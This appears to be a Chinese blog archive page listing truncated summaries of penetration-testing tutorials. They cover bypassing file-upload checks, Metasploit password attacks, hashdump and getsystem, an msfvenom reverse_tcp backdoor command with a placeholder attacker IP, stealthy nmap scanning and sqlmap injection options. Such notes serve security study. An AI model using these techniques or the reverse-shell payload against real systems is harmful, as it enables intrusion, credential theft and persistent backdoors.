09 2019 档案

摘要:思维导图: 一,js验证绕过 1.我们直接删除代码中onsubmit事件中关于文件上传时验证上传文件的相关代码即可。 或者可以不加载所有js,还可以将html源码copy一份到本地,然后对相应代码进行修改,本地提交即可。 2.burp改包,由于是js验证,我们可以先将文件重命名为js允许的后缀名,在 阅读全文
posted @ 2019-09-25 15:22 D虚拟现实 阅读(915) 评论(0) 推荐(1)
摘要:1.口令安全 search mysql_login ssh_login2.hash传递渗透hashdump3.内核提权getsystem4.后门生成 linux: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address 阅读全文
posted @ 2019-09-17 15:20 D虚拟现实 阅读(277) 评论(0) 推荐(0)
摘要:1.namp 列举远程机器开放的端口--dns-servers 8.8.8.8(使用指定域名) -Pn:停止探测之前的ICMP请求,已达到不触发防火墙安全机制-p:指定端口or范围namp 识别目标机器上的服务指纹-T(1-5)加快探测速度-sC -sV -o :-sC:使用默认探测脚本 scrip 阅读全文
posted @ 2019-09-12 08:38 D虚拟现实 阅读(452) 评论(0) 推荐(0)
摘要:1.sqlmap直接数据库,文件读取目标 -l ,-x(xml站点地图),-m(多行文本url),-r, url探测 --banner(t探测数据库), -g(Google)批量扫描注入2,使用post方式时可以指定分隔符 --pa'ram-del="&" , bp截取的文件参数后面加*如同 使用- 阅读全文
posted @ 2019-09-01 12:20 D虚拟现实 阅读(819) 评论(0) 推荐(0)